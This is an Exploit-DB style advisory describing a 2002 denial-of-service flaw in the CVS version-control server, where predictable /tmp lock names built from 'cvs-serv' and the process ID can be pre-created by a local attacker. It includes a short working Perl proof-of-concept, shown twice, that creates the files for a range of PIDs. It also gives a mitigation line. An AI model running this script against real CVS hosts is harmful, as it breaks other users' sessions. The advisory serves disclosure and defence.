CVS Predictable Temporary Filenames Denial of Service Vulnerability

vendor:

CVS

by:

SecurityFocus

4.3

CVSS

MEDIUM

Denial of Service

400

CWE

Product Name: CVS

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2002

CVS Predictable Temporary Filenames Denial of Service Vulnerability

CVS stands for Concurrent Versions Software and is an open-source package designed to allow multiple developers to work concurrently on a single source tree, recording changes and controlling versions. It is possible to cause a denial of service for users of CVS due to predictable temporary filenames. CVS uses locking directories in /tmp and combines the static string 'cvs-serv' with the process ID to use as filenames. This is trivial to guess for an attacker, and since /tmp is world writeable, directories can be created with predicted names. CVS drops root priviliges, so these directories cannot be overwritten and every session for which a locking directory has been already created (by the attacker) will be broken. The following perl script will create many directories in /tmp with incrementing pids: #!/usr/bin/perl $min=400; $max=4000; for ($x=$min;$x<=$max;$x++) { open CVSTMP, ">>/tmp/cvs-serv$x" or die "/tmp/cvs-serv$x: $!"; chmod 0600, "/tmp/cvs-serv$x"; close CVSTMP; }

Mitigation:

Ensure that the /tmp directory is not world-writable and that the CVS server is running with the least privileges necessary.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/1136/info

CVS stands for Concurrent Versions Software and is an open-source package designed to allow multiple developers to work concurrently on a single source tree, recording changes and controlling versions. It is possible to cause a denial of service for users of CVS due to predictable temporary filenames. CVS uses locking directories in /tmp and combines the static string 'cvs-serv' with the process ID to use as filenames. This is trivial to guess for an attacker, and since /tmp is world writeable, directories can be created with predicted names. CVS drops root priviliges, so these directories cannot be overwritten and every session for which a locking directory has been already created (by the attacker) will be broken.

The following perl script will create many directories in /tmp with incrementing pids:

#!/usr/bin/perl

$min=400;
$max=4000;

for ($x=$min;$x<=$max;$x++) {
open CVSTMP, ">>/tmp/cvs-serv$x" or die "/tmp/cvs-serv$x: $!";
chmod 0600, "/tmp/cvs-serv$x";
close CVSTMP;
}